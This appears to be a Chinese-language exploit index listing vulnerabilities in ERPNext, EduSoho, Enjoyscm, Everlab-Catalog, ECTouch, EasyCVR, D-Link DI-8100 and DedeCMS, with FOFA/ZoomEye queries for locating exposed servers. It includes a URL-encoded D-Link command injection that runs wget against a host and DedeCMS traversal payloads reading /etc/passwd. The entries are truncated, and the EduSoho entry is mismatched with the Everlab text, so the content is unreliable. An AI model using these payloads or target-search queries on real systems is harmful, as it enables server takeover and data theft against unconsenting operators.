E7-1ERPNext-企业资源计划系统-SQL 漏洞描述: ERPNext 系统frappe.model.db_query.get_list 文件 filters 参数存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚
E5-1EduSoho-教培系统-任意文件读取 漏洞描述: Everlab-Catalog经销商管理系统 /Util/UploadApi接口处存在任意文件上传漏洞,未经授权的攻击者可上传任意后门文件,进而控制整个服务器。(EDU刷分) 网站图片: 网络测绘: fofa语法: 钟馗之眼:app:“Ev
E4-1Enjoyscm-供应链管理系统-文件上传 漏洞描述: enjoyscm供应链管理系统 UploadFile接口处存在任意文件上传漏洞,攻击者可上传恶意木马获取服务器权限。 网络测绘: fofa语法: body=“供应商网上服务厅” 漏洞复现: payload1: POST /File/Up
E3-1Everlab-Catalog-经销商管理系统-文件上传 漏洞描述: Everlab-Catalog经销商管理系统 /Util/UploadApi接口处存在任意文件上传漏洞,未经授权的攻击者可上传任意后门文件,进而控制整个服务器。 网站图片: 网络测绘: fofa语法: 钟馗之眼:app:“
E2-1ECTouch-电商微信小程序-SQL 漏洞描述: ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进
E1-1EasyCVR-视频管理平台-InformationLeakage 漏洞描述: EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。 网站图片:
D21-1D-LINK-DI-8100-RCE 漏洞复现: payload: /msp_info.html?flag=cmd&cmd=%31%31%60%77%67%65%74%20%68%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%32%3a%39%3
D20-4DedeCMS–任意文件读取 漏洞描述: 需前台注册用户权限。 漏洞复现: payload: http://ip/dede/sys_verifies.php?action=view&filename=././/etc/passwd
D20-3DedeCMS–任意文件读取 漏洞复现: payload: /dede/sys_verifies.php?action=view&filename=././/etc/passwd
D20-2DedeCMS-RCE 漏洞描述: DedeCMS V5.7.114存在远程代码执行漏洞。产生该漏洞的原因是,虽然article_template_rand.php对编辑的文件进行了一定的限制,但攻击者仍然可以绕过这些限制并以某种方式编写代码,从而允许经过身份验证的攻击者利用该漏洞执行任意
